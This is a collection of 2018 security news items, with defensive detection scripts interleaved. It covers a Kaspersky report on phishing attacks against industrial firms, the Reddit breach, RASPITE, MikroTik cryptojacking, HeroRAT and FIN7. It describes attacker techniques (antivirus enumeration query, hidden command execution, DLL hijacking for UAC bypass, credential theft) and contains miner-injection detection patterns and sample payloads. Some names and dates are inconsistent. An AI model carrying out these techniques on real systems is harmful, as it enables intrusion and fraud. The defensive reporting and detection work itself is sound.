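        if REPORTED_INSTALL_DIRS & set(exe_dir.split("\\")):
            reasons.append("install folder name matches the report")
        if exe_dir in shadow_dirs:
            reasons.append("launch directory also holds a shadowed system DLL")
        if reasons:
            findings.append((key, value_name, reasons))
    return findings


# Constructed inventory: the legitimate winspool.drv, the report's NTLocalData
# folder with a planted copy, and a TeamViewer copy in Temp beside a planted msimg32.dll.
SAMPLE_FILES = [
    r"C:\Windows\System32\winspool.drv",
    r"C:\Users\acct\AppData\Roaming\NTLocalData\winspool.drv",
    r"C:\Users\acct\AppData\Roaming\NTLocalData\remote_admin.exe",  # placeholder name
    r"C:\Program Files\TeamViewer\TeamViewer.exe",
    r"C:\Users\acct\AppData\Local\Temp\tv\TeamViewer.exe",
    r"C:\Users\acct\AppData\Local\Temp\tv\msimg32.dll",
]

# Constructed autorun export: one RunOnce value of the reported kind, one benign Run value.
SAMPLE_AUTORUNS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "NTLocalData",
     r'"C:\Users\acct\AppData\Roaming\NTLocalData\remote_admin.exe"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     r'"C:\Program Files\Vendor\updater.exe" /quiet'),
]

if __name__ == "__main__":
    shadows = find_shadow_dlls(SAMPLE_FILES)
    for p in shadows:
        print("shadow DLL:", p)
    for key, name, reasons in flag_autoruns(SAMPLE_AUTORUNS, shadows):
        print(f"autorun {key}\\{name}: " + "; ".join(reasons))
```

Because the report notes that the RunOnce value is recreated at every start, a single snapshot of the key may miss it between boots; correlating the autorun export with the shadow-DLL listing, as the script does, catches the install directory even when the registry value is momentarily absent.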

The malware collects data on the infected machine and sends it to the command-and-control server along with the system’s identifier needed for remote administration. The data sent includes:

Operating system version
User name
Computer name
Information on the privilege level of the user on whose behalf the malware is running
Whether or not a microphone and a webcam are present in the system
Whether or not antivirus software or other security solutions are installed, as well as the UAC level
Information about security software installed in the system is obtained using the following WQL query:

root\SecurityCenter:SELECT * FROM AntiVirusProduct

The information collected is sent to the attackers’ server using the following POST request:

POST request used to send encrypted data to the command-and-control server

Another distinguishing feature of attacks that involve TeamViewer is the ability to send commands to an infected system and have them executed by the malware. Commands are sent from the command-and-control server using the chat built into the TeamViewer application. The chat window is also hidden by the malicious library and the log files are deleted.

A command sent to an infected system is executed in the Windows command interpreter using the following instruction:

cmd.exe /c start /b

The parameter “/b” indicates that the command sent by the attackers for execution will be run without creating a new window.

The malware also has a mechanism for self-destructing if the appropriate command is received from the attackers’ server.

The use of additional malware
In cases where attackers need additional data (authorization data, etc.), they download spyware to victim computers in order to collect logins and passwords for mailboxes, websites, SSH/FTP/Telnet clients, as well as logging keystrokes and making screenshots.

Additional software hosted on the attackers’ servers and downloaded to victims’ computers was found to include malware from the following families:

Babylon RAT
AZORult stealer
Hallaj PRO Rat
In all probability, these Trojans were downloaded to compromised systems and used to collect information and steal data. In addition to remote administration, the capabilities of malware from these families include:

Logging keystrokes
Making screenshots
Collecting system information and information on installed programs and running processes
Downloading additional malicious files
Using the computer as a proxy server
Stealing passwords from popular programs and browsers
Stealing cryptocurrency wallets
Stealing Skype correspondence
Conducting DDoS attacks
Intercepting and spoofing user traffic
Sending any user files to the command-and-control server
In other cases observed, after an initial analysis of an infected system, the attackers downloaded an additional malware module to the victim’s computer – a self-extracting archive containing various malicious and legitimate programs, which were apparently individually selected for each specific system.

For example, if the malware had previously been executed on behalf of a user who did not have local administrator privileges, to evade the Windows User Account Control (UAC), the attackers used the DLL hijacking technique mentioned above, but this time on a Windows system file, %systemdir%\migwiz\migwiz.exe, and a library, cryptbase.dll.

Additionally, another remote administration utility, RemoteUtilities, which provides a more extensive feature set for controlling an infected machine than RMS or TeamViewer, has been installed in some systems. Its capabilities include:

Remotely controlling the system (RDP)
Transferring files to and from the infected system
Controlling power on the infected system
Remotely managing the processes of running applications
Remote shell (command line)
Managing hardware
Capturing screenshots and screen videos
Recording sound and video from recording devices connected to the infected system
Remote management of the system registry
The attackers use a modified build of RemoteUtilities, which enables them to perform the above operations without the user’s knowledge.

In some cases, the Mimikatz utility was installed in addition to cryptbase.dll and RemoteUtilities. We believe that the attackers use Mimikatz in cases when the first system infected is not one that has software for working with financial data installed on it. In these cases, the Mimikatz utility is used to steal authentication data from the organization’s employees and gain remote access to other machines on the enterprise’s network. The use of this technique by the attackers poses a serious danger: if they succeed in obtaining the account credentials for the domain administrator’s account, this will give them control of all systems on the enterprise’s network.

Attack targets
According to KSN data, from October 2017 to June 2018, about 800 computers of employees working at industrial companies were attacked using the malware described in this paper.

Number of computers attacked by month. October 2017 – June 2018

According to our estimate, at least 400 industrial companies in Russia have been targeted by this attack, including companies in the following industries:

Oil and gas
Based on this, it can be concluded that the attackers do not concentrate on companies in any specific industry or sector. At the same time, their activity clearly demonstrates their determination to compromise specifically systems belonging to industrial companies. This choice on the part of the cybercriminals could be explained by the fact that the threat awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies). At the same time, as we have noted before, it is more common for industrial companies than for companies in other sectors to conduct operations involving large amounts of money on their accounts. This makes them an even more attractive target for cybercriminals.

This research demonstrates once again that even when they use simple techniques and known malware, threat actors can successfully attack many industrial companies by expertly using social engineering and masking malicious code in target systems. Criminals actively use social engineering to keep users from suspecting that their computers are infected. They also use legitimate remote administration software to evade detection by antivirus solutions.

This series of attacks targets primarily Russian organizations, but the same tactics and tools can be used in attacks against industrial companies in any country of the world.

We believe that the threat actor behind this attack is highly likely to be a criminal group whose members have a good command of Russian. This is indicated by the high level at which texts in Russian are prepared for phishing emails used in the attack, as well as the attackers’ ability to make changes to organizations’ financial data in Russian. More data about the research on the infrastructure and language used by the attackers is available in the private version of the report on the Threat Intelligence portal.

Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines.

The various malware components used in this attack are detected by Kaspersky Lab products with the following verdicts:


Student Charged in Elaborate Digital Money Theft Scheme

3.8.2018 securityweek Hacking

LOS ANGELES (AP) — A Massachusetts college student who was named his high school's valedictorian for his savvy tech skills hacked into unsuspecting investors' personal cellphones, email and social media accounts to steal at least $2 million in digital currency like Bitcoin, according to documents provided by California prosecutors Wednesday.

Joel Ortiz was taken into custody July 12 at Los Angeles International Airport ahead of a flight to Boston, according to prosecutors. The 20-year-old faces more than two dozen charges including grand theft, identity theft and computer hacking, court documents show. He's held on $1 million bail.

The Santa Clara County, California, public defender's office, which is representing Ortiz, declined comment. A number listed for his home in Boston was disconnected.

The elaborate scheme involved taking over victims' phones, allowing him to reset passwords and access online accounts containing electronic assets in the form of Bitcoin, Coinbase, Bittrex and Binance, the criminal complaint said.

In one case Ortiz allegedly walked into an AT&T store and impersonated a victim in order to get a new SIM card, which gave him control of the victim's phone. He obtained access to the victim's "financial and personal identifying information, tax returns, private passwords" and siphoned $10,000 from a cryptocurrency account, according to a police report.

In several instances Ortiz allegedly impersonated victims over text messages and convinced friends and family members to "loan" him digital funds, court documents said.

At one point Ortiz allegedly stole $10,000 from a California resident, and then tried to get more, calling the victim's wife and sending a text to the victim's daughter that said "TELL YOUR DAD TO GIVE US BITCOIN," the documents said.

Court documents identify more than 20 victims who live in California, and prosecutors say they know of additional victims outside of the state.

Ortiz enrolled at the University of Massachusetts Boston and studies information technology, said school spokesman DeWayne Lehman.

Ortiz was the 2016 valedictorian of Another Course to College, a small public college preparatory school in Boston, and was honored alongside other top students across the city at a luncheon that year with Democratic Mayor Marty Walsh and other officials at a downtown hotel.

At his school, Ortiz was the lead robot software programmer on its robotics team, taught other students the basics of software coding and "led efforts to teach computer science," according to a Boston Public Schools' press release touting the students' accomplishments.

The school system said Ortiz "loves science and technology," is fluent in Spanish and speaks conversational Chinese.

Boston Public Schools spokesman Daniel O'Brien declined to comment.

Cisco to Acquire Duo Security for $2.35 Billion in Cash

3.8.2018 securityweek IT

Cisco announced on Thursday that it will pay $2.35 billion in cash to acquire cloud-based identity and access management solutions provider Duo Security.

Ann Arbor, Michigan-based Duo raised $70 million in Series D funding in October 2017, which valued the company at $1.17 billion at the time.

Through its flagship two-factor authentication (2FA) app, Duo's "Trusted Access" product suite helps verify the identity of users, and the health of their devices, before granting them access to applications. The platform supports Macs, PCs and mobile devices, and gives administrators visibility into end user devices accessing the corporate network.

“Integration of Cisco's network, device and cloud security platforms with Duo Security's zero-trust authentication and access products will enable Cisco customers to easily and securely connect users to any application on any networked device,” Cisco said.

Overall, Cisco says that by getting its hands on Duo’s technology, it will be able to extend intent-based networking into multi-cloud environments, simplify policy for cloud security, and expand endpoint visibility coverage.

The acquisition is expected to close during the first quarter of Cisco's fiscal year 2019, subject to customary closing conditions and required regulatory approvals.

Duo said previously that it has doubled its annual recurring revenue for the past four years, and currently has more than 500 employees globally, after doubling its headcount in 2016.

Duo serves more than 10,000 paying customers and says it protects more than 300 million logins worldwide every month. Customers include Facebook, Etsy, K-Swiss, Paramount Pictures, Toyota, Random House, Yelp, Zillow and more.

In addition to its Ann Arbor, Michigan headquarters, Duo currently maintains offices in Austin, Texas; San Mateo, California; and London, England.

Duo Security, which will continue to be led by Dug Song, Duo Security's co-founder and chief executive officer, will join Cisco's Networking and Security business led by EVP and GM David Goeckeler.

Cisco has acquired several emerging security companies over the years. In June 2015, it announced its acquisition of OpenDNS for $635 Million. The move followed other acquisitions by Cisco in the security sector, including its acquisition of Portcullis, ThreatGRID, Neohapsis, Virtuata, and its $2.7 billion acquisition of Sourcefire in 2013. In June 2016, it agreed to pay $293 million to acquire cloud access security broker (CASB) CloudLock.

Attackers Circumvent Two Factor Authentication Protections to Hack Reddit

3.8.2018 securityweek Crypto

Popular Community Site Reddit Breached Through Continued Use of NIST-Deprecated SMS Two Factor Authentication (2FA)

Online community site Reddit announced Wednesday that it was breached in June 2018. In a refreshingly candid advisory, it provides a basic explanation of how the incident occurred, details on the extent of the breach, details on its own response, and advice to potential victims.

The extent of the breach was limited. It was discovered on June 19, and occurred between June 14 and June 18, this year. "A hacker broke into a few of Reddit's systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords," announced Chris Slowe, CTO and founding engineer at Reddit.

With more than 330 million active monthly users, Reddit is home to thousands of online communities where users can share stories and host public discussions.

Apart from the limited extent, it was also limited in scope. "The attacker did not gain write access to Reddit systems; they gained read-only access to some systems that contained backup data, source code and other logs." This comprises a complete copy of an old database backup including account credentials and email addresses (2005 to 2007); logs containing email digests sent between June 3 and June 17, 2018; and internal data such as source code, internal logs, configuration files and other employee workspace files.

"The disclosure of email addresses and their connected Reddit usernames," warns Jessica Ortega, a security researcher at SiteLock, "could potentially mean attackers can identify and dox users -- that is, release personally identifying information -- who rely on Reddit for discussing controversial topics or posting controversial images. It is recommended that all Reddit users update their passwords."

Reddit's response to the breach has been to report the incident to, and cooperate with, law enforcement; to contact users who may be impacted; and to strengthen its own privileged access controls with enhanced logging, more encryption and required token-based 2FA. It also advises all users to move to token-based 2FA.

This advice is because it believes the breach occurred through SMS intercept on one of its own employees. "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept."

This last comment has raised eyebrows. As long ago as 2016, NIST denounced SMS 2FA. "Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators," it stated in the DRAFT NIST Special Publication 800-63B.

The most common attack against SMS 2FA, explains Joseph Kucic, CSO at Cavirin, is mobile device malware designed to capture/intercept SMS messages -- a major feature for use against mobile banking apps. But, he adds, "SMS messages have had other risks: SIM swap and unauthorized access from SS7 (core telco signaling environments) -- these issues have been known and discussed in the security circles for years."

While Reddit doesn't make it clear whether the 'intercept' was via malware on an employee's mobile device or via flaws in the SS7 telecommunications protocol, the latter seems the most likely. SS7 is a telephony signaling protocol initially developed in 1975, and it has become deeply embedded in mobile telephone routing. As such it is unlikely to be corrected or replaced in the immediate future -- but the effect is that almost any mobile telephone conversation anywhere in the world can be intercepted by an advanced adversary.

The fact that SS7 attacks are not run-of-the-mill events makes Tom Kellermann, CSO at Carbon Black, wonder who might be behind the attack. "The Reddit breach seems to be more tradecraft-oriented," he told SecurityWeek. "They were victimized, but by whom: more than likely a nation-state given their capacity to influence Americans. I hope that they were not used to island hop into other victims' systems via a watering hole." According to Carbon Black research, 36% of cyberattacks attempt to leapfrog through the victims' systems into their customers' systems.

He is not alone in wondering if there may be more to this breach. "I am concerned that Reddit seems to be playing down the data breach as it was only read access to sensitive data and not write. This is positive news; however, it does not reduce the severity of the data breach when it relates to sensitive data," comments Joseph Carson, chief security scientist at Thycotic.

Of course, the attack may not have been effected via the SS7 flaws. "In this type of attack, the phone number is the weakest link," warns Tyler Moffit, senior threat research analyst at Webroot. "Cybercriminals can steal a victim's phone number by transferring it to a different SIM card with relative ease, thereby getting access to text messages and SMS-based authentication. For example, a cybercriminal would simply need to give a wireless provider an address, last 4 digits of a social security number, and perhaps a credit card to transfer a phone number. This is exactly the type of data that is widely available on the dark web thanks to large database breaches like Equifax."

"When Reddit started using SMS for Two Factor Authentication in 2003 it was a best practice," Joseph Kucic, CSO at Cavirin told SecurityWeek; adding, "The one fact about any security technology is that its effectiveness decreases over time for various reasons -- and one needs to take inventory of the deployed security effectiveness at least annually." He believes that security technologies, just like applications, have a product lifecycle, "and there is a point when an end-of-life should be declared before unauthorized individuals -- hackers or nation/state actors -- do it for you."

Reddit has earned plaudits for its breach notification as well as criticism for its continued use of SMS 2FA. "The level of detail Reddit provides," said Chris Morales, head of security analytics at Vectra, "is more than many larger organizations have provided on much more significant breaches. These details are based on an investigation and explain what happened during the breach -- how the attackers infiltrated the network and what exactly they gained access to -- and most importantly disclosed Reddit's internal processes to address the breach, including the hiring of new and expanded security staff."

Ilia Kolochenko, CEO at High-Tech Bridge, makes the point that despite Reddit's apparent openness, we still don't know everything about the breach. "Often, large-scale attacks are conducted in parallel by several interconnected cybercrime groups aimed to distract, confuse and scare security teams," he comments. "While attack vectors of the first group are being mitigated, others are actively exploited, often not without success. Otherwise, the disclosure and its timeline are done quite well by Reddit."

He also cautions against placing too much blame on Reddit's use of SMS 2FA. "I would refrain from blaming the 2FA SMS -- in many cases it's still better than nothing. Moreover, when most of business-critical applications have serious vulnerabilities varying from injections to RCE, 2FA hardening is definitely not the most important task to take care of."

Nevertheless, the consensus is that Reddit should be applauded for its disclosure, but censured for its use of SMS 2FA. "Reddit won't be the last organization to be breached via SMS authentication in the future," comments Sean Sullivan, security advisor at F-Secure. "At this point, the use of SMS-based MFA for administrators should be considered negligent."

Phishing Campaign Targets 400 Industrial Organizations

3.8.2018 securityweek Phishing

A new wave of spear-phishing emails masquerading as legitimate procurement and accounting letters have hit over 400 industrial organizations, according to Kaspersky Lab.

Data collected by Kaspersky showed that the malware associated with the campaign attacked nearly 800 company PCs across various industries. The attacks, which are ongoing, attempt to steal money and confidential data from the targeted organizations, which range from oil and gas to metallurgy, energy, construction and logistics.

The spear-phishing emails, Kaspersky’s security researchers discovered, are tailored with “content that corresponded to the profile of the attacked organizations and took into account the identity of the employee – the recipient of the letter.”

“This suggests that the attacks were carefully prepared and that criminals took the time to develop an individual letter for each user,” the researchers say.

The emails either contain malicious attachments designed to silently install modified legitimate software onto the victim’s machine, such as TeamViewer or Remote Manipulator System/Remote Utilities (RMS), or try to trick victims into following external links and downloading malicious objects from there.

Analysis of the attacks has revealed the use of various techniques to mask the presence of malware on the system. Incidents involving RMS software relied on exfiltrating data over email, while those abusing legitimate TeamViewer software sent the data directly to a command and control (C&C) server.

The main goal of these attacks is to steal money from the victim organizations’ accounts. After gaining access to a victim’s system and gathering required information by accessing documents and financial and accounting software, the attackers would engage in various financial fraud operations, such as spoofing the bank details used to make payments.

When needed, the attackers would also upload additional malware onto the compromised machines, specifically crafted for each attack. They have been using spyware, remote administration tools to expand their control over the infected systems, Mimikatz, and malware to exploit different vulnerabilities in the operating system.

Some of the malicious programs found on compromised machines include the Babylon RAT, Betabot/Neurevt, AZORult stealer and Hallaj PRO Rat families. These allowed attackers to log keystrokes, take screenshots, collect system information, download additional malware, steal passwords and crypto-currency wallets, intercept traffic, and conduct distributed denial of service (DDoS) attacks.

In some attacks, the remote administration tool called RemoteUtilities was used to remotely control the infected system, transfer files, manage running applications, manage hardware, open a remote shell, capture screenshots and screen videos, and record audio and video.

While the attacks did not appear to concentrate on companies in a specific industry or sector, the actors did focus on compromising systems belonging to industrial companies. Furthermore, most of the organizations that were hit are located in Russia, Kaspersky said.

“The attackers demonstrated a clear interest in targeting industrial companies in Russia. Based on our experiences, this is likely to be due to the fact that their level of cybersecurity awareness is not as high as it is in other markets, such as financial services. That makes industrial companies a lucrative target for cybercriminals – not only in Russia, but across the world,” Vyacheslav Kopeytsev, security expert, Kaspersky Lab, said.

Iran-Linked Actor Targets U.S. Electric Utility Firms
3.8.2018 securityweek CyberSpy

Likely operating out of Iran, the Leafminer cyber-espionage group has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group was previously said to have been targeting government and other types of organizations in the Middle East since at least early 2017, but it appears that its target list is much broader.

Dragos, which calls the actor RASPITE, says the entity has been targeting industrial control systems in numerous countries, including access operations in the electric utility sector in the United States.

Initial access to target networks is obtained through strategic website compromise (also known as watering hole attacks), the security firm says. Similar to the DYMALLOY and ALLANITE threat actors, the group embeds a link to a resource that prompts an SMB connection in order to harvest Windows credentials.

Next, the actor deploys scripts to install a malicious service that connects to RASPITE-controlled infrastructure and provides remote access to the victim machine.

Although it has focused on ICS-operating entities, RASPITE has yet to demonstrate an ICS-specific capability. At the moment, there is no indication that the actor can launch destructive ICS attacks such as the widespread blackouts that hit Ukraine.

In a report on the group last week, Symantec revealed that both custom-built malware and publicly-available tools were leveraged in observed campaigns, including a modified version of Mimikatz. Some of the tools were linked to other groups apparently tied to Iran, Symantec said, noting that the actor appears to be inspired by the Russia-linked Dragonfly group.

“Dragos caught RASPITE early in its maturity which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” Sergio Caltagirone, Director of Threat Intelligence, Dragos, said.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups,” Caltagirone continued.

Hundreds of thousands MikroTik Routers involved in massive Coinhive cryptomining campaign
3.8.2018 securityaffairs Cryptocurrency

Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.
Security experts have uncovered a massive cryptojacking campaign targeting MikroTik routers: the hackers change the configuration of the devices to inject a Coinhive cryptocurrency mining script into users’ web traffic.

The campaign was first spotted by the researcher who goes online with the Twitter handle MalwareHunterBR.

another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', #coinhive

1:31 PM - Jul 30, 2018
According to Catalin Cimpanu from Bleeping Computer, the campaign first started in Brazil, but it is rapidly expanding to other countries targeting MikroTik routers all over the world.

The same campaign was monitored by experts at Trustwave, who confirmed that the campaign initially targeted MikroTik routers used by Brazilians.

“On July 31st, just after getting back to the office from my talk at RSA Asia 2018 about how cyber criminals use cryptocurrencies for their malicious activities, I noticed a huge surge of CoinHive in Brazil.” reads the report published by Trustwave.

“After a quick look I saw that this is not your average garden variety website compromise, but that these were all MikroTik network devices.”

The experts noticed that the compromised devices, most of them in Brazil, were all using the same CoinHive sitekey, which means that they were targeted by the same attackers.

MikroTik routers compromised

According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik router.

“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited.” continues the analysis.

The vulnerability was discovered in April and patched by the vendor in just one day.

Technical details for the MikroTik flaw were publicly disclosed in May, public proof-of-concept (PoC) codes for the issue were published on GitHub.
Trustwave pointed out that many users who were not themselves using MikroTik routers were affected too, because Internet providers and large organizations use MikroTik routers that had been compromised by the hackers.

The experts noticed that once the threat actors realized they had been spotted, they switched tactics and injected the Coinhive script only into error pages returned by the routers.

After the initial phase, the campaign targeted devices outside Brazil, and it has been estimated that roughly 170,000 MikroTik routers were compromised to inject the Coinhive script. The campaign could potentially compromise over a million MikroTik routers exposed on the Internet.

“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” conclude the experts.

“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”
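One way to check for the in-path injection described above, as an added example (not Trustwave's or the article's code): scan a batch of HTTP responses for the Coinhive loader and group the hits by sitekey, since one sitekey showing up on many unrelated hosts is what separates a router or ISP injecting the script from a single compromised website. The responses, host names and sitekeys below are constructed placeholders.

```python
"""Detect Coinhive loader injection in HTTP responses and group hits by sitekey.

Added example, not code from the original article or from Trustwave. The
responses below are constructed and the sitekeys are placeholders.
"""
import re
from collections import defaultdict

# The injected loader: <script src=".../coinhive.min.js"> plus a
# CoinHive.Anonymous('<sitekey>') call that starts the miner.
LOADER = re.compile(r"<script[^>]+src=[\"'][^\"']*coinhive(?:\.min)?\.js[\"']", re.I)
SITEKEY = re.compile(r"CoinHive\.Anonymous\(\s*[\"']([A-Za-z0-9]{20,})[\"']", re.I)


def find_coinhive(body: str):
    """Return the sitekey when the body carries the Coinhive loader, else None."""
    if not LOADER.search(body):
        return None
    m = SITEKEY.search(body)
    return m.group(1) if m else "unknown"


def group_by_sitekey(responses):
    """responses: iterable of (host, status, body) tuples.
    Returns {sitekey: sorted list of distinct hosts}."""
    hosts = defaultdict(set)
    for host, _status, body in responses:
        key = find_coinhive(body)
        if key:
            hosts[key].add(host)
    return {k: sorted(v) for k, v in hosts.items()}


def in_path_injection_suspects(responses, min_hosts=3):
    """Sitekeys seen on at least min_hosts distinct hosts: a miner on one site
    is a compromised site, the same key across many sites is upstream injection."""
    return {k: h for k, h in group_by_sitekey(responses).items() if len(h) >= min_hosts}


def error_page_only(responses):
    """True when every injected response is an error page (status >= 400),
    the later, quieter variant of the campaign described in the article."""
    injected = [(s, b) for _h, s, b in responses if find_coinhive(b)]
    return bool(injected) and all(s >= 400 for s, _ in injected)


def _miner_page(status_text, key):
    """Construct a sample page carrying the loader (sample data only)."""
    return ("<html><head><script src=\"https://coinhive.example/lib/coinhive.min.js\">"
            "</script><script>var m = new CoinHive.Anonymous('" + key + "');"
            "m.start();</script></head><body>" + status_text + "</body></html>")


KEY_A = "CONSTRUCTEDKEYAAAAAAAAAAAAAAAAAA"  # placeholder sitekey
KEY_B = "CONSTRUCTEDKEYBBBBBBBBBBBBBBBBBB"  # placeholder sitekey

# Constructed responses: several unrelated hosts behind one router return error
# pages injected with KEY_A; one site serves a miner of its own with KEY_B.
SAMPLE_RESPONSES = [
    ("site1.example", 404, _miner_page("404 Not Found", KEY_A)),
    ("site2.example", 500, _miner_page("500 Internal Server Error", KEY_A)),
    ("site3.example", 403, _miner_page("403 Forbidden", KEY_A)),
    ("blog.example", 200, _miner_page("welcome", KEY_B)),
    ("clean.example", 200, "<html><body>hello</body></html>"),
]

if __name__ == "__main__":
    print(in_path_injection_suspects(SAMPLE_RESPONSES))  # KEY_A on three hosts
```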

Analyzing the Telegram-based Android remote access trojan HeroRAT
3.8.2018 securityaffairs Android

Researchers at CSE Cybsec ZLab have published their analysis of the Telegram-based Android RAT tracked as HeroRAT.
In June, researchers from security firm ESET discovered a new family of Android Remote Administration Tool (RAT), dubbed HeroRAT, that leverages the Telegram BOT API to communicate with the attacker.

The use of the Telegram API can be considered a new trend in the Android RAT landscape: other RAT families implementing the same functionality, such as TeleRAT and IRRAT, were discovered in the wild before HeroRAT.

HeroRAT appeared very active in Iran where it was spreading through third-party app stores, through tainted social media and messaging apps.

ESET experts speculate that HeroRAT borrows the source code of a malware that appeared in the hacking community in March 2018; however, it has some characteristics that distinguish it from IRRAT and TeleRAT. One of these is the use of the Xamarin framework and the TeleSharp library for the development of the RAT.

HeroRAT is offered for sale on a dedicated Telegram channel; the author offers three variants depending on their functionality: bronze (25 USD), silver (50 USD) and gold (100 USD) panels. The malware author also released a demo video in which he explains the RAT’s functionality; below is a screenshot from this demo video, showing the differences between the three variants.

Figure 1 – Differences between the RAT variants

Further details on the RAT analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by researchers at ZLab.

Three members of FIN7 (Carbanak) gang charged with stealing 15 million credit cards
3.8.2018 securityweek  CyberCrime

Three members of the cybercrime group tracked as FIN7 and Carbanak have been indicted and charged with 26 felony counts.
Three members of the notorious cybercrime gang known as FIN7 and Carbanak have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The gang stole over a billion euros from banks across the world; the name “Carbanak” comes from the name of the malware they used to compromise computers at banks and other financial institutions. The three suspects (Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kopakov, 30) are Ukrainians; they were arrested last year in Europe between January and June.

Fedorov, a skilled hacker who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently awaiting extradition to the United States.

In January 2018, foreign authorities also arrested Fedir Hladyr in Dresden, Germany; he is currently detained in Seattle pending trial. Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain. The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

According to the DoJ, the suspects stole more than 15 million credit cards from over 6,500 individual point-of-sale terminals at 3,600 business locations in 47 states.

“Three high-ranking members of a sophisticated international cybercrime group operating out of Eastern Europe have been arrested and are currently in custody facing charges filed in U.S. District Court in Seattle, announced Assistant Attorney General Brian A.” reads the press release published by the DoJ.

“In the United States alone, FIN7 successfully breached the computer networks of companies in 47 states and the District of Columbia, stealing more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations.”


“The three Ukrainian nationals indicted today allegedly were part of a prolific hacking group that targeted American companies and citizens by stealing valuable consumer data, including personal credit card information, that they then sold on the Darknet,” said Assistant Attorney General Benczkowski. “Because hackers are committed to finding new ways to harm the American public and our economy, the Department of Justice remains steadfast in its commitment to working with our law enforcement partners to identify, interdict, and prosecute those responsible for these threats.”
The trio has been accused of targeting hundreds of companies in the United States, and U.S. individuals. The list of victims is long and includes Chipotle Mexican Grill, Jason’s Deli, Sonic Drive-in, and Arby’s.

According to the European authorities, FIN7 developed a sophisticated banking trojan tracked as Cobalt, based on the Cobalt Strike penetration testing tool, that was spread through spear-phishing campaigns aimed at employees of different banks.

Once they had infected the victims’ PCs with the Carbanak malware, the hackers attempted to identify key people authorized to transfer money from the banks, in order to make transactions to fake accounts or ATMs under the control of the gang.

The three men could face many years in prison if convicted.

Alleged Iran-linked APT group RASPITE targets US electric utilities
3.8.2018 securityaffairs APT

According to Dragos firm, the RASPITE cyber-espionage group (aka Leafminer) has been targeting organizations in the United States, Europe, Middle East, and East Asia.
Researchers from industrial cybersecurity firm Dragos reported that a group operating out of Iran, tracked as RASPITE, has been targeting entities in the United States, Europe, the Middle East, and East Asia.

The group has been active since at least 2017; researchers uncovered operations aimed at government and other types of organizations in the Middle East.

“Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE.” read a blog post published by Dragos.

“Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time.”

Last week, experts from Symantec who tracked the group as Leafminer published a detailed report on the activity of the cyber espionage team who leveraged both custom-built malware and publicly-available tools in observed campaigns.

According to Symantec, the extent of the campaigns conducted by the group could be wider: the researchers uncovered a list, written in Farsi (the language of Iran), of 809 targets whose systems were scanned by the attackers.

The list groups the organizations of interest by geography and industry; it includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Now researchers from Dragos have confirmed that RASPITE is behind attacks targeting industrial control systems in several countries.

According to the experts, the hackers also accessed operations in the electric utility sector in the United States.

The hackers carry on watering hole attacks leveraging compromised websites providing content of interest for the potential victims.

RASPITE attacks appear similar to those conducted by other threat actors such as DYMALLOY and ALLANITE: the hackers inject into the compromised websites links to a resource that prompts an SMB connection, with the intent of gathering Windows credentials.

Then, the attackers deploy scripts to install malware that connects to the C&C and gives the attacker control of the compromised machine.

RASPITE attacks

According to Dragos, even though RASPITE has mainly focused on ICS-operating entities, at this time there are no reports of destructive attacks on such systems.

“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector. Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date.” continues Dragos.

“This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”

Sergio Caltagirone, Director of Threat Intelligence, Dragos, explained that his firm provided only limited information on the activity of the group to avoid “proliferation of ideas or tradecraft to other activity groups.”
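Both RASPITE write-ups above describe the same credential-harvesting trick: a watering-hole page carries a link to a resource that makes a Windows browser open an SMB connection. The scanner below is an added example (not Dragos's or Symantec's code) for checking pages you host or proxy for such references; the sample page and the host names in it are constructed placeholders.

```python
"""Scan HTML for resource references a Windows browser would resolve over SMB.

Added example, not Dragos's or Symantec's code. The sample page is constructed
and the host names are placeholders. The network-side mitigation for the
technique is blocking outbound SMB (TCP 445) and NTLM to the internet at the
edge; this scanner covers the content side.
"""
import re
from html.parser import HTMLParser

# Attributes the browser fetches automatically (or on click, for href).
FETCH_ATTRS = {"src", "href", "data", "action", "poster"}
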